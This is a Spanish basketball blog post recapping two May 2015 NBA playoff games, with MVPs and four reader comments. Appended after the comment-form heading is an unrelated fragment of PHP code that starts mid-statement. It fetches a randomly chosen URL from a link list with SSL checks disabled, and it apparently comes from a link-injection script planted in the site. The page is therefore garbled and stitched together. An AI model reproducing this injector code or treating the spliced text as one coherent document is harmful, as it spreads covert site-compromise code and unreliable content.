La Crónica: Egos heridos

07 de May de 2015 por txusma

Si alguien pensaba que dos jugadores como James Harden y Lebron James iban a dejarse arrebatar otra victoria en su propia casa estaba muy equivocado. Es lo que tiene el gen ganador, te lo hace dar todo cuando más falta hace. A Harden le llegó el momento de la ignición en el último cuarto, a Lebron en cuando el balón se puso el juego pero el resultado fue el mismo: victorias para los suyos.

LA Clippers 109 – Houston Rockets 115

Mal, muy mal pintaban las cosas para los Rockets cuando a principios del tercer cuarto, los árbitros pitaban la 4º personal a James Harden y Kevin McHale decidía sentarlo con los suyos 11 abajo. “La Barba” no se lo quería creer: en ese momento su participación parecía vital para el devenir del partido y de la eliminatoria. Pero sus compañeros se portaron y no solo mantuvieron el tipo sinó que redujeron un pelín la ventaja de los visitantes. Harden entró de nuevo al partido a falta de 2 minutos para el final del cuarto con la convicción de que haría falta todo lo que pudiera aportar para llevarse el partido. Entre él y Trevor Ariza le dieron la vuelta al marcador como si fuera un calcetín y en un visto y no visto los Rockets se vieron con 9 puntos de ventaja. Los Clippers aún les hicieron sudar con un parcial de 8-0 a su favor que eles dejaba a 4 puntos pero una bandeja de Harden (quién sinó) aseguró la victoria para los locales. La eliminatoria vuela a LA empatada a 1 pero con la sensación de que ha hecho falta un gran Harden y un muy buen Dwight Howard para conseguirlo a pesar de la baja de Chris Paul en estos dos partidos. Blake Griffin continuó en modo exhibición sobretodo en la primera parte en la que anotó 26 puntos. Acabó el partido con 34 puntos, 15 rebotes y 4 asistencias. 

MVP: James Harden (32 puntos y 7 rebotes)

Chicago Bulls 91 – Cleveland Cavaliers 106

Al final la cinta de Lebron James se va a convertir en algo mítico. Tras un par de meses sin ponérserla, Lebron saltó a la pista de nuevo con su característica cinta en la cabeza, y pareció poseido por una fuerza y una fiereza desde el minuto 1 que echamos en falta en el primer partido. De su mano los locales apalizaron a unos Bulls que prácticamente no sabían de donde les venían los golpes como indica el parcial del primer cuarto: 38-18 a favor de los locales. A partir de aquí los Cavaliers se limitaron a controlar los débiles intentos de los Bulls por meterse en el partido e incluso aumentaron la ventaja en algunos tramos del partido. Tan solo un parcial de 14-0 a favor de los Bulls a mitad del tercer cuarto puso algo de emoción al choque pero rápidamente Lebron puso las cosas en su sitio. El último cuarto fue un trámite y la eliminatoria vuela a Chicago empatada a 1 y con “The King” con ganas de sangre.

MVP: Lebron James (33 puntos, 8 rebotes, 5 asistencias)

Comenta

4 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Harden puede olvidarse de un arbitraje como el de ayer en Los Angeles, en el último cuarto le pitaron un trillón de faltas a favor. Veo bastante favoritos a los Clippers, que sin Paul han podido llevarse los dos partidos de Houston. Imperdonable error de Austin Rivers a falta de un minuto con 4 abajo y un contragolpe 2 para 1 que se le va fuera por querer hacer cosas raras.

      Citar

  2. TheDeerHunter dice:
    #2

    A harden siempre le pitan un trillon de faltas

      Citar

  3. Ruxixón dice:
    #3

    Vaya regalo la actitud de los Bulls en el partido de ayer,salieron derrotados ya de antemano habiendo robado el primero y Cleveland fue a hacer sangre y a elevarse la moral.Nada que ver con LAC,esperando a CP3 en el Staples,ahora Chicago a jugar en su casa y los Cavs recuperando a JR,importantísimo más si cabe con la duda del estado físico de Shumpert que debió torcerse el tobillo.Aún así otro partido clave el suyo.

      Citar

  4. Jose Luis dice:
    #4

    Por cierto, como es que hoy juegan bulls y no hawks? :S

    vaya gracia le hará a chicago…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>